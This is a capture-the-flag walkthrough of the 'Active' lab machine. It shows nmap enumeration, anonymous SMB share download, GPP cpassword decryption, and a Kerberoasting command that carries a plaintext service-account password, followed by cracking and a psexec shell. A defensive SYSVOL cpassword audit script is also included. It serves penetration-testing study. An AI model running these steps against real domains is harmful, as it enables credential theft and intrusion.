Active (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.100 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-07T15:01:24
|_  start_date: 2021-07-07T05:25:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 11:01:33 2021 -- 1 IP address (1 host up) scanned in 89.52 seconds

We can start with SMB enumeration.

SMB

As we can see, anonymous login to the machine's SMB shares is allowed.

The Users share cannot be accessed anonymously.

We can see there is a directory called active.htb, and it contains multiple files.

We can use the smbget command to download all the files inside the share.

smbget -R smb://10.10.10.100/Replication

Inside the directory, there is a file called Groups.xml.

We can see the user name active.htb\SVC_TGS and a cpassword value.

After some googling, we can decrypt the cpassword using this GitHub repository (the AES key Microsoft used for Group Policy Preference passwords is public, so any cpassword in SYSVOL is recoverable).

We can then use the username and password to log in to the Users share over SMB.
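As an added defensive check that is not part of the original writeup, the following Python audit script walks a copy of SYSVOL and reports every Group Policy Preference element that still carries a cpassword attribute, which is the weakness that exposed SVC_TGS here. The sample Groups.xml and its placeholder cpassword value are constructed for the example.

```python
import os
import xml.etree.ElementTree as ET

# GPP XML files that can carry a cpassword attribute (MS14-025).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}


def find_cpasswords(xml_text):
    """Return [(tag, account, cpassword)] for each element with a cpassword.

    The AES key for cpassword is published, so the presence of the attribute
    is itself the finding; the ciphertext is returned only for the report.
    """
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        for attr, value in elem.attrib.items():
            if attr.lower() == "cpassword" and value:
                account = (elem.get("userName") or elem.get("accountName")
                           or elem.get("runAs") or "<n/a>")
                findings.append((elem.tag, account, value))
    return findings


def scan_sysvol(path):
    """Walk a SYSVOL copy and map each GPP file to its cpassword findings."""
    results = {}
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8") as fh:
                    hits = find_cpasswords(fh.read())
                if hits:
                    results[full] = hits
    return results


# Constructed sample mirroring the Groups.xml layout; the cpassword value is
# a placeholder, not the one from the box.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="PLACEHOLDER_CIPHERTEXT" noChange="1"
                neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for tag, account, _ in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"cpassword found on <{tag}> for {account}")
```

Run it against a mounted or copied SYSVOL tree with scan_sysvol; any hit means the affected policy should be removed and the account's password rotated.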

User

Privilege Escalation

GetUserSPNs

We can use GetUserSPNs to request a service ticket for the Administrator account's SPN (Kerberoasting).

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

We can then save the ticket hash to a file and use John the Ripper to crack it.

This gives us the Administrator password.

We can then use psexec with the Administrator credentials to get a shell.

Got ROOT!
